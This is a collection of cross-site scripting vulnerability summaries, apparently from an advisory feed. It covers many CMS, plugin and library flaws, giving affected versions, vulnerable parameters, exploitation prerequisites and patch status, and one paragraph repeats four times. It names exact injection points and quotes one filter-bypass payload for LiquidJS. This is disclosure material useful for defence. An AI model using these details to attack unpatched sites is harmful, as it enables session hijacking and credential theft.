Cross-Site Scripting

Cross-site scripting in QianFox FoxCMS versions 1.2.0 through 1.2.6 allows a high-privileged attacker to inject malicious JavaScript via the /Tag/edit endpoint in the Administrator Backend, executing in the context of another user's browser session upon interaction. A proof-of-concept exploit has been publicly disclosed via a GitHub issue report, though the vendor has not yet acknowledged or responded to the disclosure. The CVSS 4.0 score of 1.9 and EPSS of 0.03% (9th percentile) reflect the severe prerequisite constraints - administrator-level authentication and passive user interaction - which sharply limit real-world exploitability.

Stored Cross-Site Scripting in Style Kits for Elementor (analogwp-templates) WordPress plugin versions up to and including 2.5.0 allows authenticated attackers with contributor-level access to inject persistent JavaScript payloads via the kit title parameter at the /wp-json/agwp/v1/tokens/save REST API endpoint. The injected script executes in the browser of any user who subsequently visits an affected page, with a Changed scope (S:C) indicating cross-user impact that can reach administrators. No public exploit identified at time of analysis; EPSS of 0.03% (9th percentile) signals low observed exploitation probability, though the contributor-level barrier is low on multi-author WordPress sites.

XSS sanitizer bypass in LiquidJS's strip_html filter (all versions through 10.25.7) allows stored or reflected cross-site scripting via newline-embedded HTML tags. The filter's catch-all regex branch uses JavaScript's dot operator without the dotAll flag, causing tags containing literal newline or carriage-return characters (e.g., <img\nsrc=x\nonerror=alert(1)>) to pass through unmodified - while browsers parse such tags as fully valid HTML elements and execute embedded event handlers. Publicly available exploit code exists; no vendor-released patch has been identified at time of analysis.

CarrierWave's `content_type_denylist` silently fails to block MIME types containing regex metacharacters - most critically `image/svg+xml` - because string entries are interpolated directly into a regex without `Regexp.quote` or anchoring, causing the `+` character to be treated as a quantifier rather than a literal. Any Ruby application relying on this denylist to prevent SVG uploads for stored XSS protection is completely unprotected despite believing the control is active. A publicly available proof-of-concept exploit demonstrates successful SVG bypass; no public exploit identified at time of analysis for active KEV-level exploitation.

Stored cross-site scripting (XSS) in Kirby CMS affects any site that uses the list field or a blocks field containing the list block. Per the vendor advisory, an authenticated Panel user holding update permission on such a field can bypass the Panel UI and POST unsanitized HTML directly to Kirby's content API, where it is persisted to the content file and later rendered verbatim in frontend templates, executing arbitrary JavaScript in the browsers of site visitors and logged-in users. Because the injected script is auto-firing on page load, it can hijack sessions or escalate privileges by issuing API calls as a viewing admin; no CVSS score, EPSS probability, or CISA KEV listing is available, and no public exploit was identified at time of analysis, though the vendor rates it high severity and has released fixes (Kirby 4.9.1 and 5.4.1).

Stored cross-site scripting in Prometheus versions 2.49.0 through 3.5.2/3.11.2 allows a low-privileged attacker who can inject crafted histogram metrics to execute arbitrary JavaScript in the browser of any user who views the affected metric in the legacy heatmap chart UI. Exploitation requires the non-default `--enable-feature=old-ui` flag to be set and the victim to navigate to the specific heatmap view. No public exploit code has been identified at time of analysis, but the vulnerability is technically straightforward - a missing `escapeHTML()` call on `le` label values rendered as axis tick labels in Graph.tsx. This is the third stored DOM XSS in Prometheus's web UI in recent years, following CVE-2019-10215 and CVE-2026-40179.

The GDPR cookies module for Backdrop CMS (before 1.x-1.3.5) doesn't sufficiently protect visitors from Cross Site Scripting (XSS) if a malicious value has been provided for the optional 'Info content' field for the YouTube service. This is mitigated by the fact that an attacker must have a role with the permission "Create a GDPR Cookies Service" or "Edit any GDPR Cookies Service" and a site must have added a YouTube service as configuration.

Arbitrary JavaScript execution in SailingLab AppLock 4.3.8 for Android is triggered by a malicious co-installed app sending a crafted VIEW intent with a javascript: URI to the exposed BrowserMainActivity component. Because AppLock operates with elevated permissions by design (it restricts access to other apps), this unsafe WebView navigation path creates a changed-scope impact: script execution occurs within AppLock's privilege context, enabling UI spoofing and potential privilege escalation beyond what a normal app could achieve. No public exploit identified at time of analysis beyond the publicly available proof-of-concept published by the reporter on GitHub.

Cross-site scripting (XSS) in PbootCMS v.3.2.11 allows a high-privileged authenticated attacker to inject malicious JavaScript into the site configuration functionality, which executes in the browser of any user who subsequently views the affected configuration page. Despite the description using the term 'code injection,' CWE-79 and the XSS tag confirm this is a stored or reflected XSS class vulnerability, not arbitrary server-side code execution. A GitHub-hosted proof-of-concept exists (TazmiDev/CVE-2026-36239), and no public patch has been identified at time of analysis; no active exploitation has been confirmed by CISA KEV.

A cross-site scripting vulnerability exists in Aterm. Arbitrary scripts may be executed in the web browser of a user accessing the web management interface via adjacent network.

Stored or reflected cross-site scripting in vBulletin 6.x login component allows authenticated users with low privileges to inject malicious scripts that execute when other users interact with the manipulated login function. Public proof-of-concept exists (CVSS E:P) but detailed exploitation steps are being withheld by VulDB. Vendor did not respond to disclosure, and no patch release has been announced. EPSS data unavailable; not listed in CISA KEV, suggesting limited observed exploitation despite public POC availability.

TypeBot is a chatbot builder tool. Versions 3.15.2 and prior contain a critical stored XSS vulnerability in the app.typebot.io profile picture upload form. The application fails to sanitize or restrict SVG/XML-based uploads and directly renders them when accessed through the domain. By uploading a crafted malicious SVG file containing embedded JavaScript, an attacker will execute arbitrary JavaScript code. This vulnerability directly enables stored XSS exploitation because the payload is persistently stored on your infrastructure (app.typebot.io) and accessible from a public-facing, permanent link. Stored XSS via malicious SVG uploads to app.typebot.io allows attackers to execute arbitrary JavaScript in victims' browsers, enabling session/token theft, account takeover, and exfiltration of sensitive user data. This issue has been fixed in version 3.16.0.

Stored XSS in Typebot's JavaScript viewer embed (packages/embeds/js) allows any authenticated bot author - including free-tier users - to inject arbitrary JavaScript into a visitor's browser by setting a rich text bubble link URL to a javascript: URI. When a visitor clicks the malicious link within an embedded bot, the payload executes in the host page's origin (S:C scope change), enabling exfiltration of cookies and session tokens from the embedding third-party site. No public exploit code or active exploitation is confirmed at time of analysis; a vendor-released patch is available in v3.16.0.

Stored cross-site scripting in Typebot chatbot builder versions 3.15.2 and prior allows a malicious imported or collaborator-crafted bot to execute arbitrary HTML/JavaScript in the authenticated builder context via the RatingButton component's customIcon.svg field. Because the builder preview renders bots inline on builder.typebot.io under a CSP permitting 'unsafe-inline', successful exploitation enables session hijacking and privilege escalation within the SaaS builder, with no public exploit identified at time of analysis.

Parsing arbitrary HTML which is then rendered using Render can result in an unexpected HTML tree. This can be leveraged to execute XSS attacks in applications that attempt to sanitize input HTML before rendering.

Parsing arbitrary HTML which is then rendered using Render can result in an unexpected HTML tree. This can be leveraged to execute XSS attacks in applications that attempt to sanitize input HTML before rendering.

Parsing arbitrary HTML which is then rendered using Render can result in an unexpected HTML tree. This can be leveraged to execute XSS attacks in applications that attempt to sanitize input HTML before rendering.

Parsing arbitrary HTML which is then rendered using Render can result in an unexpected HTML tree. This can be leveraged to execute XSS attacks in applications that attempt to sanitize input HTML before rendering.

Concrete CMS version 9.0 to 9.5.0 is vulnerable to Stored XSS via page name in the Atomik theme. A rogue editor can inject arbitrary JavaScript that executes in the context of any authenticated user visiting the affected account pages. This can lead to session hijacking, credential theft, malicious actions performed on behalf of users, and potential privilege escalation. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.1 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting.

Reflected Cross-Site Scripting in WP Blockade - Visual Page Builder (all versions through 0.9.14) allows authenticated attackers holding at minimum a WordPress Subscriber-level account to inject arbitrary JavaScript into pages rendered in a victim's browser. The vulnerability exists in the render_shortcode_preview() function, which passes raw GET input through do_shortcode() without sanitization or output escaping - when the input is not a recognized shortcode, WordPress returns it verbatim, causing any embedded script to execute. Exploitation requires social engineering an authenticated user (e.g., an admin) into clicking a crafted link, but the low barrier to entry (Subscriber-level account) significantly widens the attacker pool on multi-user WordPress installations. No public exploit code has been identified at time of analysis, and this CVE is not listed in the CISA KEV catalog.

Stored Cross-Site Scripting in the KIA Subtitle WordPress plugin (all versions through 4.0.1) allows authenticated attackers with Contributor-level access to inject persistent malicious scripts via the `before` and `after` attributes of the `the-subtitle` shortcode. Any site visitor loading a page containing the injected shortcode will execute the attacker's script in their browser context. No public exploit code or CISA KEV listing has been identified at time of analysis, but the low privilege bar (Contributor) and network-accessible attack vector make this a meaningful risk for multi-author WordPress sites.

Reflected Cross-Site Scripting in the CBX 5 Star Rating & Review WordPress plugin (versions up to and including 1.0.7) allows unauthenticated remote attackers to inject arbitrary JavaScript via the unsanitized 'page' parameter rendered in administrative log templates. Successful exploitation requires social engineering an authenticated administrator into clicking a crafted URL, limiting automated mass exploitation while remaining a realistic threat in targeted phishing campaigns against WordPress site owners. No public exploit code or CISA KEV listing has been identified at time of analysis.

Stored Cross-Site Scripting in the Draft List WordPress plugin (versions up to and including 2.6.3) allows authenticated attackers with author-level access to inject arbitrary web scripts into draft post titles using attribute-breakout techniques. The critical aggravating factor is the changed scope (S:C in CVSS): the unescaped rendering path is specifically triggered for users who lack edit capabilities, meaning the payload executes against unauthenticated visitors and subscribers - not just privileged users. No public exploit has been identified at time of analysis, but Wordfence disclosure and the low privilege bar (author-level sufficient) make this a meaningful cross-user threat in any multi-author WordPress environment.

A cross-site scripting (XSS) vulnerability in SketchUp 2026's Dynamic Components feature allows remote code execution and local file exfiltration through maliciously crafted SKP files. The vulnerability stems from improper input sanitization in the component options window, enabling attackers to execute arbitrary system commands and read local files without user interaction by exploiting an embedded Internet Explorer 11 browser.

Cross Site Scripting vulnerability in Advantech WebAccess/SCADA 8.0-2015.08.16 allows a remote attacker to obtain sensitive information via the decryption field in the Create New Project User component

Stored XSS in Concrete CMS 9.5.0 and below allows a high-privileged authenticated attacker to inject malicious scripts via the cvName parameter of external-link pages, exploiting a sanitization bypass in the updateCollectionAliasExternal function. The injected payload is persisted server-side and executes in the browser of any user who subsequently views the affected page within the CMS backend. The vendor-assigned CVSS v4.0 score of 2.0 reflects constrained real-world impact: exploitation requires admin-level credentials, prerequisite attack conditions (AT:P), and passive victim interaction, with no public exploit identified at time of analysis.

Stored cross-site scripting in the Simple Hierarchical Select (SHS) module for Drupal 7 (versions 7.x-1.0 through 7.x-1.10) enables authenticated attackers with taxonomy term editing privileges to inject malicious scripts via unsanitized term names. Two distinct code paths are confirmed vulnerable: field formatter output rendered by shs_field_formatter_view and term-tree child data generated by shs_term_get_children, both of which fail to apply proper output escaping before HTML rendering. No public exploit is identified at time of analysis and no CISA KEV listing exists, but the network-accessible attack vector combined with Drupal 7's end-of-life status substantially elevates residual risk for unpatched deployments.

Stored cross-site scripting in the Drupal 7 Term Reference Tree module (versions 7.x-1.x through 7.x-1.11) exposes two distinct injection vectors in its widget and formatter rendering pipeline, both exploitable by any authenticated user with taxonomy term edit permissions. Vector A triggers when the Token module is enabled and token display templates are configured, allowing attacker-controlled term description output to render unsanitized. Vector B targets the widget itself, where taxonomy term labels are written to form output without sanitization, executing injected scripts in the browsers of users who view any form containing the widget. No public exploit code has been identified at time of analysis and the vulnerability is not listed in CISA KEV, but the low privilege bar and persistent nature of stored XSS make this a meaningful risk in multi-user Drupal 7 deployments.

Cross-site scripting in twig/markdown-extra and twig/cssinliner-extra arises from three filters - html_to_markdown, markdown_to_html, and inline_css - being incorrectly registered with is_safe => ['all'], which instructs Twig's autoescaper to suppress output encoding in every context including JS, CSS, and URL. When attacker-controlled content flows through these filters and the result is interpolated into a non-HTML context such as an inline script block, the autoescaper emits the raw output verbatim, enabling XSS without the developer ever using the explicit |raw bypass. Notably, html_to_markdown has an additional entity-decoding gadget via league/html-to-markdown that converts encoded HTML entities back to live markup during code span generation, creating a secondary injection path even in HTML contexts. No public exploit identified at time of analysis and no CISA KEV listing.

Stored cross-site scripting in Concrete CMS 9.5.0 and earlier allows authenticated editors to inject persistent JavaScript via the unvalidated 'height' parameter, executing in any subsequent visitor's browser. The CVSS 4.0 score of 7.3 reflects high privilege requirements (editor role) combined with high impact, and no public exploit identified at time of analysis.

Stored cross-site scripting in Concrete CMS 9.5.0 and earlier allows a high-privileged admin to inject arbitrary HTML/JavaScript into the OAuth authorize template via the integration name field. The flaw arises because the integration name is wrapped in <strong> tags by PHP string interpolation before being passed to the t() translation helper, causing the resulting raw HTML to be rendered when end users view the OAuth consent screen. No public exploit identified at time of analysis, but a rogue or compromised admin could potentially harvest OAuth login submissions from victims.

Reflected XSS in Concrete CMS 9.5.0 and below allows a remote unauthenticated attacker to inject and execute arbitrary JavaScript in the browser of an authenticated admin or report viewer who clicks a crafted URL targeting the legacy form reports dashboard. The vulnerable component, Concrete\Core\Legacy\Pagination, raw-interpolates a user-controlled URL value directly into an HTML href attribute, enabling attribute injection per CWE-83. With a CVSS 4.0 score of 6.0 and high confidentiality impact (VC:H) on the vulnerable system, successful exploitation can lead to session token theft; no public exploit has been identified at time of analysis and the vulnerability is not listed in CISA KEV.

Stored cross-site scripting in Webmin before 2.641 allows low-privileged authenticated attackers to inject arbitrary JavaScript via the email template description field in the System and Server Status module. The payload is persisted through save_tmpl.cgi and rendered without HTML encoding by list_tmpls.cgi, executing in the browser of any user who subsequently views the template list - a population likely to include privileged administrators. No public exploit has been identified at time of analysis, and the vulnerability is not listed in CISA KEV; a vendor-released patch (Webmin 2.641) is available.

HTML injection (stored XSS) in the Umbraco CMS Backoffice confirmation dialog allows authenticated low-privilege users to inject arbitrary HTML into an input field that is subsequently rendered without output encoding when a confirmation dialog is triggered. Affected versions span nuget/Umbraco.Cms 14.0.0 through 17.3.5. The CVSS score of 4.6 reflects the constrained attack surface: exploitation requires an authenticated Backoffice session and a second victim user to interact with the dialog, limiting blast radius to the admin panel rather than public-facing surfaces. No public exploit identified at time of analysis and this CVE does not appear in the CISA KEV catalog.

NocoDB's refresh-token cookie in versions up to and including 0.301.3 was misconfigured in `setTokenCookie` - issued with only `httpOnly: true` and no `secure` or `sameSite` attributes - exposing two distinct attack paths: cookie interception over plain HTTP networks and CSRF against the `POST /api/v2/auth/token/refresh` endpoint, which returns a new JWT without validating any CSRF token. Because refresh tokens carry multi-day expiry windows via `NC_REFRESH_TOKEN_EXP_IN_DAYS`, successful exploitation yields a long-lived credential for follow-on account access. No public exploit has been identified at time of analysis and no released patched version is confirmed, despite a documented fix in the GitHub advisory GHSA-f74w-272x-mqcv.

Reflected XSS in NocoDB's Page Leaving Warning component allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser by delivering a crafted URL containing a `javascript:` URI in the `ncRedirectUrl` or `ncBackUrl` query parameters. All NocoDB npm releases up to and including version 0.301.3 are affected, and no vendor-released patch has been identified at time of analysis. No active exploitation has been confirmed (not in CISA KEV), but the GitHub Security Advisory provides sufficient technical specificity - including the exact vulnerable file and parameter names - to enable independent POC development.

Stored/reflected cross-site scripting in the md-fileserver npm package (versions prior to 1.10.3) allows remote unauthenticated attackers to execute arbitrary JavaScript in a viewer's browser by uploading or supplying Markdown files containing raw HTML or script tags. The vulnerability stems from markdown-it being configured with html:true and rendered output being injected into the template without sanitization or output encoding. No public exploit identified at time of analysis beyond the vendor-provided PoC, and the issue is not currently listed in CISA KEV.

Reflected cross-site scripting in Open ISES Tickets before version 3.44.2 allows JavaScript injection via ten unsanitized POST parameters in ticketsmdb_import.php, with payloads executing in the victim's browser upon response rendering. The vendor-released patch v3.44.2 addresses this as part of a critical security update that simultaneously fixed 88 vulnerabilities including 69 XSS and 19 SQL injection issues across the codebase, suggesting systemic input sanitization failures rather than an isolated defect. No public exploit code has been identified at time of analysis, and this CVE is not listed in the CISA KEV catalog.

Reflected XSS in Open ISES Tickets (all versions before 3.44.2) allows injection of arbitrary JavaScript via the unsanitized ticket_id GET parameter in routes_i.php, rendered directly into HTML form hidden input value attributes. When a victim visits or is redirected to a crafted URL, the payload executes in their browser within the application's security context. No public exploit or CISA KEV listing exists at time of analysis, but the patch release (v3.44.2) simultaneously fixes 88 vulnerabilities - 69 of them XSS - indicating systemic input sanitization failures throughout the codebase that substantially elevate the overall risk posture of this application.

Reflected cross-site scripting in Open ISES Tickets (all versions before 3.44.2) allows attackers to inject arbitrary JavaScript through unsanitized id and ticket_id GET parameters in patient_w.php, which are written directly into an HTML form action URL without output encoding. Successful exploitation requires the victim to actively click a crafted link, after which the payload executes in the victim's browser under the application's origin, enabling session hijacking or unauthorized actions. No public exploit code has been identified at time of analysis, and the vulnerability is not listed in the CISA KEV catalog; however, the scale of the v3.44.2 release - patching 69 XSS and 19 SQL injection issues simultaneously - suggests the codebase has historically received minimal security review.

Reflected XSS in Open ISES Tickets before 3.44.2 exposes authenticated users to arbitrary JavaScript execution via unsanitized GET parameters in patient.php. The vulnerability exists in the id and ticket_id parameters, whose values are written directly into an HTML form action URL without output encoding, enabling an attacker to craft a malicious link that executes script in the victim's browser upon rendering. No public exploit or active exploitation has been identified at time of analysis; however, the vendor's v3.44.2 release confirms this is one of 69 XSS vulnerabilities patched simultaneously, indicating systemic input-handling failures across the application.

Reflected XSS in Open ISES Tickets (all versions before 3.44.2) allows JavaScript injection via the unsanitized `ref` and `mode_orig` POST parameters in `os_watch.php`, which are written verbatim into HTML form hidden input value attributes without output encoding. An attacker who can trick a user into submitting a crafted POST request will have arbitrary JavaScript execute in that user's browser session, enabling session theft, credential harvesting, or UI redress attacks. No public exploit code or CISA KEV listing has been identified at time of analysis; however, the patch release simultaneously addressed 88 vulnerabilities - including 19 SQL injection issues - suggesting this application carried significant accumulated security debt that amplifies organizational risk beyond this single CVE.

Reflected cross-site scripting in Open ISES Tickets before version 3.44.2 allows an attacker to inject arbitrary JavaScript via the unsanitized _type POST parameter in landb.php, which is echoed directly into an HTML form hidden input value attribute without encoding. When a victim renders the crafted response, the injected script executes in their browser context, enabling session hijacking, credential theft, or forced action on behalf of the victim. This CVE is one of 69 XSS vulnerabilities addressed in the v3.44.2 critical security update; no public exploit has been identified at time of analysis and it is not listed in CISA KEV.

Reflected cross-site scripting in Open ISES Tickets before v3.44.2 enables JavaScript injection via the frm_add_str POST parameter in ics214.php, which reflects the unsanitized value directly into an HTML form hidden input value attribute. When a victim renders the crafted response, the payload executes in their browser session, enabling session hijacking or action-on-behalf-of-user attacks. No public exploit has been identified and this CVE is not listed in CISA KEV, though the v3.44.2 release addresses 88 total vulnerabilities - including SQL injection and hardcoded credentials - making upgrade broadly critical regardless of this specific finding.

Reflected cross-site scripting in Open ISES Tickets before 3.44.2 allows a malicious actor to inject arbitrary JavaScript into a victim's browser session via the unsanitized frm_add_str POST parameter in ics213rr.php, where the value is written directly into an HTML form hidden input attribute without escaping. The CVSS 4.0 vector scores this at 5.1 with scope change to subsequent systems (SC:L/SI:L), meaning successful exploitation affects data beyond the immediately vulnerable component. No public exploit code or CISA KEV listing exists at time of analysis; a vendor-released patch (v3.44.2) is confirmed available and also resolves 87 additional vulnerabilities including SQL injection, hardcoded credentials, and SSL validation failures.

Reflected cross-site scripting in Open ISES Tickets before v3.44.2 allows injection of arbitrary JavaScript through the frm_add_str POST parameter in ics213.php, which is rendered unsanitized inside an HTML hidden input value attribute. The CVSS 4.0 vector (PR:N/UI:A) indicates no privileges are required on the attacker side, but victim interaction is mandatory - a user must submit or be tricked into triggering the crafted request. This CVE is one of 69 XSS vulnerabilities patched in the v3.44.2 critical security release, signaling systemic input sanitization failures across the codebase. No public exploit code has been identified at time of analysis, and this CVE does not appear in the CISA KEV catalog.

Reflected cross-site scripting in Open ISES Tickets before version 3.44.2 allows injection of arbitrary JavaScript via the unsanitized frm_add_str POST parameter in ics205a.php, which is rendered verbatim inside an HTML form hidden input value attribute in the victim's browser. This CVE is one of 69 XSS vulnerabilities patched in the v3.44.2 release - a 'Critical Security Update' that also addressed 19 SQL injection issues and 5 hardcoded secrets, revealing systemic input handling failures across the codebase. No public exploit identified at time of analysis and no CISA KEV listing; however, the broader security debt in this application makes upgrading urgent beyond this single CVE.

Reflected cross-site scripting in Open ISES Tickets (all versions before 3.44.2) allows injection of arbitrary JavaScript through the frm_add_str POST parameter in ics205.php, which is rendered unsanitized inside an HTML form hidden input value attribute. The attacker must induce an authenticated victim to submit a crafted request (UI:A), limiting opportunistic exploitation but enabling session hijacking, credential theft, or further browser-based attacks against logged-in users. This CVE is one of 69 XSS vulnerabilities patched in v3.44.2, which also addressed 19 SQL injection issues and hardcoded credentials - indicating systemic input-handling deficiencies across the PHP codebase. No public exploit code has been identified at time of analysis, and the vulnerability is not listed in the CISA KEV catalog.

Reflected cross-site scripting in Open ISES Tickets before version 3.44.2 enables JavaScript injection via the frm_add_str POST parameter in ics202.php, where the unsanitized value is written directly into an HTML form hidden input value attribute. The CVSS 4.0 vector (PR:N/UI:A) indicates no attacker privilege is required, but victim interaction is mandatory - meaning an attacker must deceive a user into submitting a crafted POST request to trigger execution. This CVE is one of 69 XSS vulnerabilities patched in the v3.44.2 release alongside 19 SQL injection flaws and 5 hardcoded secrets, signaling a systemic insecurity posture in the codebase prior to this release. No public exploit identified at time of analysis; no CISA KEV listing.

Reflected cross-site scripting in Open ISES Tickets (all versions before 3.44.2) exposes the icons/buttons/landb.php endpoint to arbitrary JavaScript injection via unsanitized frm_name and frm_id POST parameters, which are rendered directly into both HTML content and inline JavaScript without encoding or sanitization. An attacker who can socially engineer an authenticated user into triggering a crafted POST request can execute arbitrary JavaScript within that user's browser session, enabling session hijacking, credential theft, or malicious UI manipulation. No public exploit has been identified at time of analysis; a vendor-released patch (v3.44.2) is available and all users are urged to upgrade immediately per the vendor's own release advisory.

Reflected XSS in Open ISES Tickets before 3.44.2 allows JavaScript injection via unsanitized POST parameters (module_choice, flag, confirmation) in delete_module.php, executing attacker-supplied code in the browser of a victim who interacts with a crafted request. The CVSS 4.0 vector (PR:N/UI:A) indicates the attacker requires no privileges but depends on active victim interaction - consistent with a POST-based reflected XSS delivered via a cross-site auto-submitting form targeting an authenticated session. No public exploit has been identified at time of analysis, and vendor-released patch v3.44.2 is available, a landmark release that simultaneously addressed 88 vulnerabilities including 19 SQL injections and 68 additional XSS issues across the same codebase.

Reflected XSS in Open ISES Tickets before v3.44.2 allows JavaScript injection via six unsanitized POST parameters in db_loader.php (ticketshost, ticketsdb, ticketsuser, ticketspassword, ticketsprefix, db_schema), each reflected verbatim into HTML form input value attributes. An attacker who can deliver a crafted POST request to a victim's browser can execute arbitrary JavaScript in the victim's session context, enabling session hijacking or credential theft. The vendor-confirmed fix (v3.44.2) was released as a critical security update resolving 88 total vulnerabilities; no public exploit or CISA KEV listing is identified at time of analysis.

Reflected XSS in Open ISES Tickets (versions before 3.44.2) allows network-based attackers to inject arbitrary JavaScript through the frm_id POST parameter in circle.php, requiring victim interaction with a crafted link or form. The vulnerability executes malicious scripts in the victim's browser context with low-scope impact to confidentiality and integrity. No public exploit code or active exploitation has been identified at time of analysis. VulnCheck reported this as one of 69 XSS vulnerabilities patched in the v3.44.2 security release, which addressed 88 total security issues including SQL injection and hardcoded credentials.

Reflected XSS in Open ISES Tickets before v3.44.2 enables JavaScript injection through the unsanitized ticket_id POST parameter in add_nm.php, which is embedded without encoding into both an HTML form input value attribute and an inline JavaScript string literal - two distinct injection contexts. When a victim renders the malicious response, attacker-controlled script executes in their browser with potential to steal session tokens or perform actions under their identity. No public exploit exists and the vulnerability is not in CISA KEV, but the v3.44.2 release notes reveal 88 co-patched security defects (including 19 SQL injection issues and hardcoded secrets), meaning any unpatched deployment faces compounded, systemic risk far beyond this single CVE.

Reflected cross-site scripting in Open ISES Tickets before 3.44.2 allows injection of arbitrary JavaScript via the ticket_id POST parameter in add.php, which is echoed unsanitized into an HTML form input value attribute. The CVSS 4.0 vector scores this at 5.1 with no privileges required and active user interaction needed, though the CVE description characterizes attackers as authenticated - a discrepancy discussed in the risk section. No public exploit code or CISA KEV listing exists at time of analysis. This vulnerability is one of 69 XSS issues patched in a single v3.44.2 release that also addressed 19 SQL injection flaws and 5 hardcoded secrets, suggesting systemic insecure coding practices across the codebase.

Request Tracker is vulnerable to a reflected cross-site scripting (XSS) vulnerability via the "Page" parameter in GET requests. An attacker can craft a URL that, when opened, results in arbitrary JavaScript execution in the victim’s browser. This vulnerability affects versions from 5.0.4 up to 5.0.9 and from 6.0.0 up to 6.0.2.

Stored Cross-Site Scripting in Avada (Fusion) Builder for WordPress (all versions through 3.15.2) allows authenticated attackers with Subscriber-level access to persist malicious JavaScript via unsanitized shortcode parameters. The injected scripts execute in the browser of any user - typically an administrator - who views a page rendering dynamic user data such as biographical information sourced through the plugin's Dynamic Data feature. With CVSS Scope set to Changed (S:C), successful exploitation crosses the victim's security boundary, enabling session hijacking or privilege escalation against higher-privileged users. No public exploit code or CISA KEV listing has been identified at time of analysis.

Stored Cross-Site Scripting in the WPB Floating Menu & Categories WordPress plugin (all versions through 1.0.8) permits authenticated attackers holding Editor-level privileges or higher to inject arbitrary JavaScript via the 'Icon CSS Class' category field. The injected payload persists in the database and executes in the browser of any site visitor who loads a page containing the affected floating menu component, enabling session hijacking or credential harvesting against arbitrary users including administrators. No public exploit has been identified at time of analysis, and the plugin is not listed in the CISA KEV catalog; the CVSS 4.9 Medium score reflects the significant mitigation provided by the high-privilege prerequisite.

Stored cross-site scripting in the Taiko AG1000-01A SMS Alert Gateway (Rev 7.3 and Rev 8) lets authenticated low-privilege users plant persistent JavaScript in the device's web configuration interface by splitting payloads across multiple admin form fields. The injected script executes in any administrator session that views dashboard pages such as index.zhtml, enabling session hijack or privilege escalation within the appliance. No public exploit identified at time of analysis, and the issue is not listed in CISA KEV.

Reflected cross-site scripting in Open ISES Tickets before v3.44.2 allows attackers to inject arbitrary JavaScript into victim browsers via the unsanitized `frm_query` POST parameter in `search.php`, which is echoed verbatim into an HTML input `VALUE` attribute. The CVSS 4.0 score of 5.1 (Medium) reflects a required active user interaction step (UI:A) that limits opportunistic exploitation - a victim must be induced to submit a crafted request. No public exploit code has been identified at time of analysis and the vulnerability is not listed in CISA KEV; however, a vendor-released patch (v3.44.2) is available and should be applied immediately, as it simultaneously addresses 88 security vulnerabilities - including 68 additional XSS flaws across 22 files - indicating systemic insecurity in all prior versions.

Reflected XSS in Open ISES Tickets before 3.44.2 enables injection of arbitrary JavaScript via the unsanitized `the_ticket` GET parameter in do_unit_mail.php, which is written directly into a JavaScript variable assignment without output encoding. An attacker who can deliver a crafted URL to a user of the application can execute arbitrary JavaScript in that user's browser session, enabling session hijacking, credential theft, or UI redirection. No active exploitation is confirmed (not in CISA KEV), and no public POC is identified at time of analysis, though a patch commit and vendor release are publicly available, raising the exposure window.

Reflected cross-site scripting in Open ISES Tickets before 3.44.2 allows injection of arbitrary JavaScript via the ticket_id GET parameter in routes_nm.php, which is unsanitized and written directly into an HTML hidden input field VALUE attribute. The CVSS 4.0 vector (PR:N) indicates no privileges are required, but the CVE description explicitly characterizes the attacker as authenticated - this discrepancy must be verified with the vendor before determining actual exploitation prerequisites. Active user interaction is required (UI:A), meaning exploitation depends on a victim clicking a crafted URL. No public exploit has been identified at time of analysis and this CVE is not listed in the CISA KEV catalog.

Reflected XSS in Open ISES Tickets before version 3.44.2 allows an attacker to inject arbitrary JavaScript into a victim's browser session via the thelat and thelng GET parameters in street_view.php, where values are passed unsanitized directly into JavaScript variable assignments. The attack requires user interaction - a victim must visit a crafted URL - and the CVSS 4.0 score of 5.1 reflects limited scope impact (SC:L/SI:L). Notably, this CVE is one of 69 XSS vulnerabilities patched in the v3.44.2 release, which also addressed 19 SQL injection flaws and 5 hardcoded secrets, indicating severe systemic security debt in the codebase. No public exploit identified at time of analysis, and no CISA KEV listing.

Reflected XSS in Open ISES Tickets before version 3.44.2 enables JavaScript injection via the ticket_id GET parameter in add_facnote.php, which is written unsanitized into a hidden HTML input field's VALUE attribute. An attacker can craft a URL containing a JavaScript payload and trick a user into visiting it, causing script execution in the victim's browser session within the application's origin. No public exploit has been identified at time of analysis, and a vendor-released patch is confirmed at v3.44.2. Notably, this CVE is one of at least 69 XSS vulnerabilities addressed in the same release, indicating systemic input sanitization failures across the codebase.

Reflected cross-site scripting in Open ISES Tickets before v3.44.2 allows attackers to execute arbitrary JavaScript in a victim's browser by delivering a crafted URL containing a payload in the `frm_call` GET parameter of `opena.php`, which is reflected directly into page output without sanitization. The CVSS 4.0 vector scores this at 5.1 (Medium), with impact limited to the subsequent browser context (SC:L/SI:L) rather than the server itself. No public exploit has been identified at time of analysis, and this CVE is not listed in CISA KEV - however, the v3.44.2 release patched 88 total vulnerabilities including 19 SQL injection flaws, indicating systemic security debt warranting urgent upgrade regardless of this CVE's moderate score.

Reflected XSS in Open ISES Tickets before 3.44.2 enables JavaScript injection via the ticket_id GET parameter in patient_JF.php, where the unsanitized value is written directly into a JavaScript variable assignment in the server response. The CVSS 4.0 vector (PR:N, UI:A) indicates no authentication is required from the attacker's side, though the CVE description contradicts this by specifying 'authenticated attackers' - this conflict should be verified with the vendor. Exploitation requires the victim to actively visit a crafted URL, limiting mass exploitation, but the broader v3.44.2 release context - which patches 88 total vulnerabilities including 19 SQL injection flaws - signals systemic input validation failures across the codebase. No public exploit code or CISA KEV listing has been identified at time of analysis.

Reflected XSS in Open ISES Tickets before 3.44.2 allows injection of arbitrary JavaScript via the unsanitized ticket_id GET parameter in add_note.php, with payload execution occurring in the browser of any authenticated user who visits a crafted URL. The CVSS 4.0 score of 5.1 (Medium) reflects the mandatory user interaction requirement and impact scope limited to the browser context, with no server-side confidentiality or integrity impact. No public exploit code or active exploitation has been identified at time of analysis; the vendor released v3.44.2 as a critical security update that addresses this issue alongside 87 additional vulnerabilities.

Reflected cross-site scripting in Open ISES Tickets before version 3.44.2 allows an attacker to inject arbitrary JavaScript via the ticket_id GET parameter in single.php, which is rendered unsanitized into an HTML attribute and executed in a victim's browser upon visiting a crafted URL. This vulnerability is one of 69 XSS issues patched in the v3.44.2 release, which also addressed 19 SQL injection flaws and hardcoded credentials - signaling systemic input handling deficiencies across the application. No public exploit code or CISA KEV listing has been identified at time of analysis, but the CVSS 4.0 score of 5.1 and mandatory user interaction (UI:A) limit automated exploitation.

